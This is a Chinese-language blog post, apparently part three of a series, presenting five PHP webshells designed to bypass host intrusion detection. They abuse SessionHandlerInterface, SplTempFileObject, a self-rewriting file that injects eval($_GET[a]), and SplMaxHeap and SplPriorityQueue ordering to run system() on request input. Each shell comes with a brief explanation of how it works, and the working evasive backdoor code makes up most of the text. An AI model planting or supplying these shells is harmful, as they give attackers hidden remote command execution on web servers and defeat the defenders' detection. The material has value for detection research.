WEB安全--RCE--webshell HIDS bypass3

继WEB安全--RCE--webshell HIDS bypass2的补充:

八、定义类实现接口

webshell:

php 复制代码
<?php
ini_set("display_errors",1);
class MySessionHandler implements SessionHandlerInterface
{
 // implement interfaces here
 public function close()
 {
 // TODO: Implement close() method.
 }
 public function destroy($id)
 {
 // TODO: Implement destroy() method.
 }
 public function gc($max_lifetime)
 {
 // TODO: Implement gc() method.
 }
 public function open($path, $name)
 {
 $path($name);
 }
 public function read($id)
 {
 // TODO: Implement read() method.
 }
 public function write($id, $data)
 {
 // TODO: Implement write() method.
 }
}
$handler = new MySessionHandler();
session_set_save_handler($handler, true);
session_name($_GET[a]);
session_save_path('system');
session_start();

原理:

我们定义了一个类MySessionHandler,其实现了SessionHandlerInterface接口

执行位置在这里

我们传递path和name,并用session_start()启动会话就能执行我们定义MySessionHandler类中的open()方法了。

九、读取临时文件

webshell:

php 复制代码
<?php
$a = new SplTempFileObject(1000000);
$a->fwrite( $_GET['a']);
$a->rewind();
substr(get_declared_classes()[70],4,6)($a->fgets());
//fgets() 从临时文件中读取一行数据。
?>

原理:

php 复制代码
$a = new SplTempFileObject(1000000);

这行代码创建了一个临时文件对象$a,其最大容量为1000000字节。

php 复制代码
$a->rewind();

rewind()方法将文件指针移动到文件的开头。这对于后续读取操作是必要的,因为数据已经写入到临时文件中,而现在我们需要从文件的开头读取数据。

十、自己改变自己

webshell:

php 复制代码
<?php
$s="Declaring file object\n";
$d=$_SERVER['DOCUMENT_ROOT'].$_SERVER['DOCUMENT_URI'];
$file = new SplFileObject($d,'w');
$file->fwrite("<?php"." eva".$s[3]);
$file->fwrite("(\$_"."GET"."[a]);?>");
include(get_included_files()[0]);
?>

原理:

构造文件绝对路径:

php 复制代码
$d=$_SERVER['DOCUMENT_ROOT'].$_SERVER['DOCUMENT_URI'];

使用SplFileObject创建一个文件对象$file,并以写入模式('w')打开文件。

然后$file使用fwrite写入代码,代码执行过后会被修改为

php 复制代码
<?php eval($_GET['a']); ?>

get_included_files():返回当前脚本中已经被加载的文件列表

php 复制代码
include(get_included_files()[0]);

而get_included_files()[0]就代表返回的是该文件本身,并用include()执行改写后的代码

十一、堆排序

webshell:

php 复制代码
<?php
$obj=new SplMaxHeap();
$obj->insert( $_GET[a] );
$obj->insert( 8 );
$obj->insert( 'system' );
$obj->insert( 7 );
$obj->insert( 0 );
//$obj->recoverFromCorruption();
$i=0;
foreach( $obj as $number ) {
 $i++;
 if($i==1) {
 $a = $number;
 }
 if($i==2) {
 $b = $number;
 }
}
$a($b);

原理:

提取插入过后obj变量的值,后命令执行,

这里需要理解堆排序的原理,然后根据原理来选出a和b对应的值

当我们$_GET[a]传入的数据为s,那么堆排序就是:8 7 0 's' 'system'

当我们$_GET[a]传入的数据为99;ls,那么堆排序就是:'system' '99;ls' 8 7 0

所以第二种情况取出的数据就能拼接为system(99;ls)

十二、优先队列排序

webshell:

php 复制代码
<?php
ini_set("display_errors",1);
$objPQ = new SplPriorityQueue();
$objPQ->insert('m',1);
$objPQ->insert('s',7);
$objPQ->insert('e',3);
$objPQ->insert('s',5);
$objPQ->insert('y',6);
$objPQ->insert('t',$_GET[a]);
$objPQ->setExtractFlags(SplPriorityQueue::EXTR_DATA);
//Go to TOP
$objPQ->top();
$m='';
$cur = new ErrorException($_GET[b]);
while($objPQ->valid()){
 $m.=$objPQ->current();
 $objPQ->next();
}
echo $m($cur->getMessage());
?>

原理:

与堆排序的原理相似,也是通过传入的参数来影响能否组成命令执行代码

当$_GET[a]传入的值为4,队列的排序会组成system

进而拼接为system($_GET[b]);

相关推荐
患得患失9494 分钟前
【前端】【css预处理器】Sass与Less全面对比与构建对应知识体系
前端·css·sass
独行soc7 分钟前
2025年渗透测试面试题总结-匿名[校招]安全服务工程师(题目+回答)
linux·python·安全·web安全·面试·职场和发展·渗透测试
Yvonne爱编码1 小时前
JavaScript- 3.2 JavaScript实现不同显示器尺寸的响应式主题和页面
java·开发语言·前端·javascript·计算机外设·ecmascript
筱筱°2 小时前
Vue CLI创建vue项目,安装插件
前端·javascript·vue.js
IT信息技术学习圈2 小时前
OpenAI大模型不听人类指令事件的技术分析与安全影响
人工智能·安全
st紫月2 小时前
Vue3 封装el-table组件
前端·javascript·vue.js
AORO_BEIDOU2 小时前
三防平板科普:有什么特殊功能?应用在什么场景?
网络·5g·安全·电脑·信息与通信
@菜菜_达3 小时前
CSS Animation 详解
前端·css
风流野趣fly3 小时前
端午节互动网站
前端·vue·vite·端午节·端午节网站·节日活动网站
从零开始学习人工智能3 小时前
HTML5 视频播放器:从基础到进阶的实现指南
前端·音视频·html5